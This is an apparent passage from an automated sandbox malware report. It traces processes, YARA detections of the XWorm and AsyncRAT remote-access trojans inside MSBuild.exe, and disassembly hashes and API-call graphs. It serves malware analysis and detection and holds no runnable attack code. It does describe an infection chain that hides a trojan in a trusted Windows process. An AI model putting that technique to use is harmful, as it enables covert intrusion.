                                                  Memory Activities

                                                  Show Windows behavior

                                                  System Activities

                                                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                  Show Windows behavior

                                                  Windows UI Activities

                                                  Process Token Activities

                                                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                  General

                                                  Target ID:9
                                                  Start time:23:16:31
                                                  Start date:25/03/2025
                                                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\strztqek\strztqek.cmdline"
                                                  Imagebase:0x7ff6af780000
                                                  File size:2'759'232 bytes
                                                  MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true
                                                  Show Windows behavior

                                                  File Activities

                                                  Show Windows behavior

                                                  Section Activities

                                                  Show Windows behavior

                                                  Registry Activities

                                                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                  Show Windows behavior

                                                  Process Activities

                                                  Show Windows behavior

                                                  Thread Activities

                                                  Show Windows behavior

                                                  Memory Activities

                                                  Show Windows behavior

                                                  System Activities


                                                  General

                                                  Target ID:10
                                                  Start time:23:16:32
                                                  Start date:25/03/2025
                                                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBA33.tmp" "c:\Users\user\AppData\Local\Temp\strztqek\CSC690A104BD3BA4E08BCA82F5F59FD8A8.TMP"
                                                  Imagebase:0x7ff674ee0000
                                                  File size:52'744 bytes
                                                  MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true
                                                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                  Show Windows behavior

                                                  Section Activities

                                                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                  Show Windows behavior

                                                  Process Activities

                                                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                  General

                                                  Target ID:11
                                                  Start time:23:16:32
                                                  Start date:25/03/2025
                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                  Imagebase:0xea0000
                                                  File size:262'432 bytes
                                                  MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000B.00000002.3711769567.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000B.00000002.3711769567.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                  • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000B.00000002.3715200506.0000000003451000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  Reputation:high
                                                  Has exited:false
                                                  Show Windows behavior

                                                  File Activities

                                                  Show Windows behavior

                                                  Section Activities

                                                  Show Windows behavior

                                                  Registry Activities

                                                  Show Windows behavior

                                                  COM Activities

                                                  Show Windows behavior

                                                  Mutex Activities

                                                  Show Windows behavior

                                                  Process Activities

                                                  Show Windows behavior

                                                  Thread Activities

                                                  Show Windows behavior

                                                  Memory Activities

                                                  Show Windows behavior

                                                  System Activities

                                                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                  Network Activities

                                                  Process Token Activities

                                                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                  Disassembly

                                                  Executed Functions

                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1372112356.00007FFC3DB10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DB10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7ffc3db10000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c7c97d7f6ab48074671d276624a525052fcdb89ccaa02cb3d789018a35346349
                                                  • Instruction ID: 72c265f286c68f1e74dcc1af1efa962d16120a30e7b31a5ebb24f5560ffd4100
                                                  • Opcode Fuzzy Hash: c7c97d7f6ab48074671d276624a525052fcdb89ccaa02cb3d789018a35346349
                                                  • Instruction Fuzzy Hash: 7B824632A0DBAE4FEB96D76848551B57FE1EF562A4B0801FBD04DC7193F9189C09C3A2
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1372112356.00007FFC3DB10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DB10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7ffc3db10000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b1c8d8b888d8efa9235c6b86d4d1a7c6fa18dd1dad59051a9db60d66618022bd
                                                  • Instruction ID: 958283b4cfdf77982edb60b9947065669ccfad326f22ae255399054a650449b5
                                                  • Opcode Fuzzy Hash: b1c8d8b888d8efa9235c6b86d4d1a7c6fa18dd1dad59051a9db60d66618022bd
                                                  • Instruction Fuzzy Hash: 58B11A6191EAEE4FEBA6976908252B57FE0DF56364B1800FBC049C70D3ED189C16D3A2
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1372112356.00007FFC3DB10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DB10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7ffc3db10000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 03b56e00658e5d9a55fd6a307ce5eba769921839ada4c3b4d3151c4272d832da
                                                  • Instruction ID: cf8c3a2587cfa1f5e4fb7fb90dc7b1821fa4021ed569f74ef102bd729514de0c
                                                  • Opcode Fuzzy Hash: 03b56e00658e5d9a55fd6a307ce5eba769921839ada4c3b4d3151c4272d832da
                                                  • Instruction Fuzzy Hash: 39514672D0DBAE4FE796DB6848546793BE1EF66294B4901FBC04CC7293E8149C09D392
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1372112356.00007FFC3DB10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DB10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7ffc3db10000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 46da49d18282ac9903bfc752c70ed770a5c131ec44c4c8e68206bd52823ae8f2
                                                  • Instruction ID: 1737d786bf0ca0afddafa82fe5517254ed637ca86bc14a8982a67c6d99f841e3
                                                  • Opcode Fuzzy Hash: 46da49d18282ac9903bfc752c70ed770a5c131ec44c4c8e68206bd52823ae8f2
                                                  • Instruction Fuzzy Hash: 82410B62E0EAEF4BFBE9D268446527896D2DF552D875800BAC40DC31D3FD0C9859E2A3
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1372112356.00007FFC3DB10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DB10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7ffc3db10000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6c5e6dd197a159a80acd7f708083a50707aad81427033c48cb309c12c20a5ea8
                                                  • Instruction ID: dd69811bf70aaad6b18bc2d9ab5c309c82ca720af2bee512f4f824ac49001e5d
                                                  • Opcode Fuzzy Hash: 6c5e6dd197a159a80acd7f708083a50707aad81427033c48cb309c12c20a5ea8
                                                  • Instruction Fuzzy Hash: F031EB52E2EAAF4FFAA9D2A904651BC56D1EF5529471800BAC40DC31D3FC0C9C59E3A3
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1372112356.00007FFC3DB10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DB10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7ffc3db10000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9f2925dea9fd3c540805948eebbbda05e92c36e679a61e1f9d1db826efdafa96
                                                  • Instruction ID: 38bb1a0028eddbcd794c979931d35beef043b6e1b129041743357ce3fc704fd9
                                                  • Opcode Fuzzy Hash: 9f2925dea9fd3c540805948eebbbda05e92c36e679a61e1f9d1db826efdafa96
                                                  • Instruction Fuzzy Hash: E501D622F0D93E0AFAA5D29D20542B892C2DFE8EE4F440176C40DD328DFD189C09A6D1
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1371529451.00007FFC3DA40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DA40000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7ffc3da40000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7b26c731aaab75d51fe5d9e46a495a706df9f0b7e692b1c878dc6014b7411961
                                                  • Instruction ID: fc7a4b59d4201364bdb3d30607e6665f0f3980f60867fe0ee32dd75990e890bc
                                                  • Opcode Fuzzy Hash: 7b26c731aaab75d51fe5d9e46a495a706df9f0b7e692b1c878dc6014b7411961
                                                  • Instruction Fuzzy Hash: 6F01D63095891D4FE394EB2CD4593B9B3E1FF98342F10057EE84DC32A5EE6A6881C751
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1371529451.00007FFC3DA40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DA40000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7ffc3da40000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                  • Instruction ID: 7444b6609f28087d910808c231d144f218f7a854408e8b7b37039d44acc4d915
                                                  • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                  • Instruction Fuzzy Hash: 5501A73110CB0C8FD744EF0CE051AB5B7E0FB85360F10052DE58AC3661DA36E882CB41

                                                  Non-executed Functions

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1371529451.00007FFC3DA40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DA40000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7ffc3da40000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 7>)$(7>)$07>)$87>)$@7>)$H7>)$P7>)
                                                  • API String ID: 0-2296636642
                                                  • Opcode ID: 1d71aa07538d46506544543b52311913fc4dbbaf4fc474a7f6ed277cbf3e74ce
                                                  • Instruction ID: c3ce7c0008c19445765d29f354576816aa6c130a1a1a3a8c4a87b06957629ae3
                                                  • Opcode Fuzzy Hash: 1d71aa07538d46506544543b52311913fc4dbbaf4fc474a7f6ed277cbf3e74ce
                                                  • Instruction Fuzzy Hash: D1413070618A6ACFE709DB6C9050764BFE5DF56740B9401E5E04CCB2D3EDA8AC42C775

                                                  Execution Graph

                                                  Execution Coverage

                                                  Dynamic/Packed Code Coverage

                                                  Signature Coverage

                                                  Execution Coverage:12%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:0%
                                                  Total number of Nodes:46
                                                  Total number of Limit Nodes:5
                                                  Show Legend
                                                  Hide Nodes/Edges
                                                  execution_graph 11948 15818e0 11949 15818e4 11948->11949 11952 1581b78 11949->11952 11958 1581a61 11949->11958 11953 1581b4f 11952->11953 11954 1581ba1 11953->11954 11964 1582018 11953->11964 11968 1581fbd 11953->11968 11972 158200a 11953->11972 11954->11949 11960 1581a9c 11958->11960 11959 1581ba1 11959->11949 11960->11959 11961 1582018 GlobalMemoryStatusEx 11960->11961 11962 158200a GlobalMemoryStatusEx 11960->11962 11963 1581fbd GlobalMemoryStatusEx 11960->11963 11961->11960 11962->11960 11963->11960 11965 1582021 11964->11965 11976 1582a38 11965->11976 11966 158211e 11966->11966 11969 1581fc4 11968->11969 11971 1582a38 GlobalMemoryStatusEx 11969->11971 11970 158211e 11970->11970 11971->11970 11973 1582021 11972->11973 11975 1582a38 GlobalMemoryStatusEx 11973->11975 11974 158211e 11974->11974 11975->11974 11978 1582a26 11976->11978 11977 1582b5e 11977->11966 11978->11976 11978->11977 11982 1587b10 11978->11982 11986 1587b00 11978->11986 11979 1582f02 11979->11966 11983 1587b35 11982->11983 11990 1587da2 11983->11990 11984 1587b97 11984->11979 11987 1587b35 11986->11987 11989 1587da2 GlobalMemoryStatusEx 11987->11989 11988 1587b97 11988->11979 11989->11988 11994 1587dd8 11990->11994 11999 1587de8 11990->11999 11991 1587dbe 11991->11984 11995 1587dec 11994->11995 11996 1587df5 11995->11996 12004 158776c 11995->12004 11996->11991 12000 1587e1d 11999->12000 12001 1587df5 11999->12001 12002 158776c GlobalMemoryStatusEx 12000->12002 12001->11991 12003 1587e3a 12002->12003 12003->11991 12005 1587773 GlobalMemoryStatusEx 12004->12005 12007 1587e3a 12005->12007 12007->11991

                                                  Executed Functions

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1307 15877ca-15877cc 1308 158782c-1587834 1307->1308 1309 15877ce-15877d3 1307->1309 1310 15877e6-15877e8 1308->1310 1311 1587836-15878b8 1308->1311 1309->1310 1312 15877ea-15877eb 1310->1312 1313 1587773 1310->1313 1315 1587ec0-1587efe 1311->1315 1312->1308 1313->1315 1316 1587f06-1587f34 GlobalMemoryStatusEx 1315->1316 1317 1587f3d-1587f65 1316->1317 1318 1587f36-1587f3c 1316->1318 1318->1317
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3713110315.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_1580000_MSBuild.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 645a6381ecb637d66741e602ef76fe6cac3ae6c20b38cf46646a7a8550d0e836
                                                  • Instruction ID: dc2273c139b0a5a208bb9583e6aa20ed5458b56d69d9b106900b4d11ddca98df
                                                  • Opcode Fuzzy Hash: 645a6381ecb637d66741e602ef76fe6cac3ae6c20b38cf46646a7a8550d0e836
                                                  • Instruction Fuzzy Hash: 0A21A9B2C14659DBCB10DFAAC845BAEBBF4FB48310F24845AD418BB241D339A505CFA2

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1321 158776c-1587f34 GlobalMemoryStatusEx 1325 1587f3d-1587f65 1321->1325 1326 1587f36-1587f3c 1321->1326 1326->1325
                                                  APIs
                                                  • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,01587E3A), ref: 01587F27
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3713110315.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_1580000_MSBuild.jbxd
                                                  Similarity
                                                  • API ID: GlobalMemoryStatus
                                                  • String ID:
                                                  • API String ID: 1890195054-0
                                                  • Opcode ID: 4dc5600fec7e2027649c8a52fd9da617a7a10893b6502f3b915e739c172faa33
                                                  • Instruction ID: 9f8f2cadcfcdb1ca1441d8de7acb729fc0866b5ebc26824d86fe1dcdb2452e66
                                                  • Opcode Fuzzy Hash: 4dc5600fec7e2027649c8a52fd9da617a7a10893b6502f3b915e739c172faa33
                                                  • Instruction Fuzzy Hash: 8E1144B1C1065A9FCB10DF9AD444BDEFBF4FB48210F11852AE818B7240D378A901CFA1

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1329 1587eba-1587efe 1330 1587f06-1587f34 GlobalMemoryStatusEx 1329->1330 1331 1587f3d-1587f65 1330->1331 1332 1587f36-1587f3c 1330->1332 1332->1331
                                                  APIs
                                                  • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,01587E3A), ref: 01587F27
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3713110315.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_1580000_MSBuild.jbxd
                                                  Similarity
                                                  • API ID: GlobalMemoryStatus
                                                  • String ID:
                                                  • API String ID: 1890195054-0
                                                  • Opcode ID: 0f82d249790645fdc7811274227fc856046803f5ce29aee9704eb2847946488b
                                                  • Instruction ID: 3435bd1be2e66673794dec26125170d14611d54b053eeb81a7c3283ef5c5bd24
                                                  • Opcode Fuzzy Hash: 0f82d249790645fdc7811274227fc856046803f5ce29aee9704eb2847946488b
                                                  • Instruction Fuzzy Hash: 5B1122B1C0066A9FDB10CF9AD444B9EFBF0BF48210F11816AD818B7240D378A955CFA1
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3712590844.000000000149D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0149D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_149d000_MSBuild.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 034cedd4e7585b5033c34519bd32b83665df4632f28946db626b5512472745b1
                                                  • Instruction ID: 1b2a28ba50e013c786b4bdb8986edc110102c1ffb7ec33292952bc4a0ea205d9
                                                  • Opcode Fuzzy Hash: 034cedd4e7585b5033c34519bd32b83665df4632f28946db626b5512472745b1
                                                  • Instruction Fuzzy Hash: 45210371904204EFDF15DF94D9C0B57BF65FB88310F24C1BAE9090A266C33AE856CAA2
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3712590844.000000000149D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0149D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_149d000_MSBuild.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a0ffab5f0a75abba76e46da30f4106ab1a9b5d88ed3f9b00d643379fe76b32b3
                                                  • Instruction ID: 0fe85d43b5e2efb9c87e7da93653905ba3954961e3532070748f889b30fa1dca
                                                  • Opcode Fuzzy Hash: a0ffab5f0a75abba76e46da30f4106ab1a9b5d88ed3f9b00d643379fe76b32b3
                                                  • Instruction Fuzzy Hash: D211DF72804240DFCF16CF54D9C4B5ABF61FB84320F24C1AAD8090B267C33AE456CBA1